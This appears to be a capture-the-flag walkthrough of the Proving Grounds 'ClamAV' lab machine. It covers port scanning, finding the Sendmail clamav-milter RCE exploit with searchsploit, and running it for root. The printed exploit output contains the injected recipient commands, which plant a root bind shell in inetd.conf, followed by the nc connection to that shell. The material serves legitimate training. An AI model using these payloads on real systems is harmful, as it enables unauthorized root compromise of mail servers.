Skip to content

PG - ClamAV Walkthrough

clamav-info

TL;DR

  • Enumerate SNMP and find traces of clamav-milter
  • Exploit sendmail which is vulnerable to RCE

Enumeration

Port Scan

Start with a basic scan on target using Nmap. 

$ nmap -sVC -T4 -v -p- -oN nmapFull.txt $ip
...
PORT    STATE SERVICE     VERSION                                                        
22/tcp  open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp  open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.49.180], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 [email protected]. 2.0.0 For local information send email to P
ostmaster at your site. 2.0.0 End of HELP info 
80/tcp  open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open  smux        Linux SNMP multiplexer
445/tcp open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)

Searching for publicly disclosed exploits

We now know the target is running a sendmail 8.13.4. A quick search on sendmail using searchsploit leads us to RCE vulnerability.

$ searchsploit sendmail 
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                                                                        |  Path                           
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...                                                                                                                              | unix/local/21884.txt
Sendmail 8.13.5 - Remote Signal Handling (PoC)                                                                                        | linux/dos/2051.py
Sendmail 8.6.9 IDENT - Remote Command Execution                                                                                       | unix/remote/20599.sh
Sendmail 8.9.2 - Headers Prescan Denial of Service                                                                                    | irix/dos/23167.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)                                                              | linux/dos/21476.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)                                                              | linux/dos/21477.c
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                       | multiple/remote/4761.pl
...
While RCE vulnerability is present, we dont actually know if the sendmail on target machine is running with clamav-milter.

I actually wasn't able to find any trace of clamav-milter before using the exploit. I tried the exploit and it worked so never gave a thought about it. I happen to look at the official walkthrough later on, only to find out that we were supposed to do a enumeration on SNMP to get more information regarding clamav-milter. While I skipped the crucial part for this box, I now have a updated checklist for my enumeration methodology. Learn from your mistake and never be afraid to check out walkthroughs and guides if you are stuck.

Exploitation

Copy the exploit to your desired working directory.

$ searchsploit -m multiple/remote/4761.pl                         
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/4761                  
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl       
File Type: ASCII text, with CRLF line terminators
Copied to: /home/kali/oscp/boxes/pg/clamav/exploit/4761.pl
Its a perl script which take target ip. On successful attempt it will start a bind shell at port 31337 which we can use to get access to the target machine. 

$ sudo perl 4761.pl 192.168.154.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.154.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Tue, 24 Aug 2021 13:37:10 -0400; (No UCE/UBE) logging access from: [192.168.49.154](FAIL)-[192.16
8.49.154]
250-localhost.localdomain Hello [192.168.49.154], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 17OHbALb003999 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

Now connect to shell on port 31337 using nc. 

$ nc 192.168.154.42 31337
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat proof.txt
<Redacted>
Since we get the shell as with root privileges, there is no need for privilege escalation.